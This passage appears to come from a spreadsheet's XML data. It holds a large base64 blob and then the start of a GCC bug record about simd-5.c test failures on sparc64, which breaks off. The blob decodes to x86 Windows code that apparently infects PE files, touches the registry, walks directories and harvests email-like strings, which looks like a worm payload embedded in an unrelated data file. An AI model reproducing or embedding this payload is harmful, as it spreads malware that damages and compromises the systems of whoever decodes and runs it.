 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</t>
  </si>
  <si>
    <t>GCC-9200</t>
  </si>
  <si>
    <t>C testsuite failures in compile/simd-5.c w/-m64 or on sparcv9/sparc64</t>
  </si>
  <si>
    <t>I'm getting testsuite failures on the 3.4 trunk from gcc.c-torture/compile/simd-5.c on sparc-solaris2.7 with -m64 as seen here:
http://gcc.gnu.org/ml/gcc-testresults/2003-01/msg00234.html
Here's an example on sparcv9 with no special flags:
